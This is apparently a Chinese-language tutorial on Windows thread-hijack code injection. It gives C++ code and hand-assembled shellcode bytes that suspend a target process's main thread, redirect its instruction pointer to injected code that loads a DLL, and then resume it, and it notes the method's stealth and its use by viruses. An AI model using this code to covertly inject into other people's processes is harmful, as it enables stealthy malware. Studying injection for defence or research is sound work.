0x00挂起线程注入原理

1.主要是shellcode注入进程后 要让他在获取线程上下文后，修改到我们写入的ShellCode处执行（修改Eip为ShellCode处的地址）

2.含义 A->B B做操作在给到A

//获得线程上下背景文

Ret = GetThreadContext(ThreadHandle, &OldContext);

if (Ret==FALSE)

{

MessageBox("GetThreadContext 失败");

return;

}

NewContext = OldContext;

//含义 A->B B做操作在给到A

#ifdef _WIN64

NewContext.Rip = (DWORD)AllocBuffer;

OldEip = NewContext.Rip;

#else

NewContext.Eip = (DWORD)AllocBuffer;//下一指令到申请的内存空间处

OldEip = NewContext.Eip;

#endif

//;将指针指向ShellCode第一句push 12345678h中的地址,写入返回地址

Ret = WriteProcessMemory(ProcessHandle, ((char*)AllocBuffer) + 1, &OldEip, sizeof(DWORD), NULL);

if (!Ret)

{RETURN;}

3.shellcode构造

这种注入方式的思路：首先先向目标程序中写入我们的ShellCode,比如说写入LoadLibry加载我们的DLL。然后把目标进程中当主线程挂起，然后获取线程上下文，修改线程上下文中的EIP到我们写入的ShellCode处执行完代码，然后再设置为线程原来的上下文·继续执行，执行完成过后在目标中释放申请的空间。

具体编程实现大致实现思路：

构造ShellCode

VirtualAllocEx在目标进程中申请空间，WriteProcessMemory写入ShellCode

通过线程快照获取目标主线程

OpenThread打开线程，SuspendThread挂起线程

GetThreadContext获取目标主线程线程上下文

SetThreadContext修改目标主线程上下文到我们写入的ShellCode处执行

ResumeThread恢复线程让ShellCode执行

VirtualFreeEx扫尾释放空间

其实挂起线程注入的思路其实也是挺简单的，而且这种方式相对于常规的DLL注入，隐蔽性更高,一些病毒也比较喜欢用这种方式。

下面介绍详细的实现步骤。

 

 

0x01 挂起线程注入详细的编程实现

由于这种注入方式要注入ShellCode，用C++实现比较麻烦一点因为要扣二进制，我也用汇编一个版本，在附件中，这里还是用C++

?ShellCode的构造，LoudLibrary加载DLL

//结构必须字节对齐1

#pragma pack(1)

typedef struct _INJECT_CODE

{

BYTE byPUSH;

DWORD dwPUSH_VALUE;

BYTE byPUSHFD;

BYTE byPUSHAD;

BYTE byMOV_EAX; //mov eax, addr szDllpath

DWORD dwMOV_EAX_VALUE;

BYTE byPUSH_EAX; //push eax

BYTE byMOV_ECX; //mov ecx, LoadLibrary

DWORD dwMOV_ECX_VALUE;

WORD wCALL_ECX; //call ecx

BYTE byPOPAD;

BYTE byPOPFD;

BYTE byRETN;

CHAR szDllPath[MAX_PATH];

}INJECT_CODE, *PINJECT_CODE;

#pragma pack()

利用C++注入不用考虑重定位的问题，因为C++中提供offsetof宏可以求出变量偏移，但是在汇编实现中就要考虑求变量的偏移了，如下图

其实在这注入方式中，最有学习意义的就是ShellCode的构造，我总结了一些我在构造ShellCode中学习到的知识点。

代码重定位

在目标进程中，要想实现API调用的难点其实就是传参数，因为我们的注入程序和目标进程中基址是不一样的，这样就注定了写入参数的地址不一样，这就涉及到重定位问题。

经典的重定位代码。

Call $+5 ;将下一行的地址入栈，获得目标进程下一行的地址

FIXADDR： ;这个是注入进程中地址Lable，用于求差值

Pop ebp ;弹出入栈的目标进程的地址

Sub ebp,FIXADDR ;求得目标进程与注入进程中的地址差值

求出了目标进程和注入进程之间的地址差，就可以访问我们写入变量的地址了。

 

释放问题

一定要等所有的ShellCode执行完成再释放空间，否则会有同步问题，导致目标程序崩溃。

?打开进程，写入ShellCode

//打开进程

g_hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, m_dwPid);

if (!g_hProcess)

{

MessageBox("OpenProcess 失败");

return;

}

g_lpBuffer=VirtualAllocEx(g_hProcess,NULL,0x1000,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

if (!g_lpBuffer)

{

MessageBox("VirtualAllocEx 失败");

return;

}

//给ShellCode结构体赋值

ic.byPUSH = 0x68;

ic.dwPUSH_VALUE = 0x12345678;

ic.byPUSHFD = 0x9C;

ic.byPUSHAD = 0x60;

ic.byMOV_EAX = 0xB8;

ic.dwMOV_EAX_VALUE = (DWORD)g_lpBuffer + offsetof(INJECT_CODE, szDllPath);

ic.byPUSH_EAX = 0x50;

ic.byMOV_ECX = 0xB9;

ic.dwMOV_ECX_VALUE = (DWORD)&LoadLibrary;

ic.wCALL_ECX = 0xD1FF;

ic.byPOPAD = 0x61;

ic.byPOPFD = 0x9D;

ic.byRETN = 0xC3;

memcpy(ic.szDllPath, m_strDllPath.GetBuffer(0), m_strDllPath.GetLength());

//写入ShellCode

bRet = WriteProcessMemory(g_hProcess, g_lpBuffer, &ic, sizeof(ic), NULL);

if (!bRet)

{

MessageBox("写入内存失败");

return;

}

ƒ创建线程快照查找目标程序主线程

//创建线程快照查找目标程序主线程

te32.dwSize = sizeof(te32);

hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);

if (hThreadSnap == INVALID_HANDLE_VALUE)

{

MessageBox("CreateToolhelp32Snapshot 失败");

return;

}

//遍历查询目标程序主线程ID

if (Thread32First(hThreadSnap, &te32))

{

do

{

if (m_dwPid == te32.th32OwnerProcessID)

{

dwThreadId = te32.th32ThreadID;

break;

}

} while (Thread32Next(hThreadSnap, &te32));

}

④打开并且挂起目标主线程，获取线程上下文，修改Eip为ShellCode处的地址

//挂起目标主线程

bRet = SuspendThread(hThread);

if (bRet == -1)

{

MessageBox("SuspendThread 失败");

return;

}

oldContext.ContextFlags = CONTEXT_FULL;

bRet = GetThreadContext(hThread, &oldContext);

if (!bRet)

{

MessageBox("GetThreadContext 失败");

return;

}

newContext = oldContext;

newContext.Eip = (DWORD)g_lpBuffer;

//;将指针指向ShellCode第一句push 12345678h中的地址,写入返回地址

bRet = WriteProcessMemory(g_hProcess, ((char*)g_lpBuffer) + 1, &oldContext.Eip, sizeof(DWORD), NULL);

if (!bRet)

{

MessageBox("写入内存失败");

return;

}

 

⑤设置上下文，恢复线程跑起来

bRet = SetThreadContext(hThread, &newContext);

if (!bRet)

{

MessageBox("SetThreadContext 失败");

return;

}

//然后把主线程跑起来

bRet = ResumeThread(hThread);

if (bRet == -1)

{

MessageBox("ResumeThread 失败");

return;

}

⑥扫尾工作，单独设了个函数清除目标进程中申请的空间，注意这个操作务必等待我们的ShellCode执行完再执行，否则会导致目标程序崩溃

if (!VirtualFreeEx(g_hProcess, g_lpBuffer, 0, MEM_RELEASE))

{

MessageBox("VirtualFreeEx 失败");

return;

}

MessageBox("释放对方空间成功");

详细源码见附件

 

实验效果如下，Dll注入成功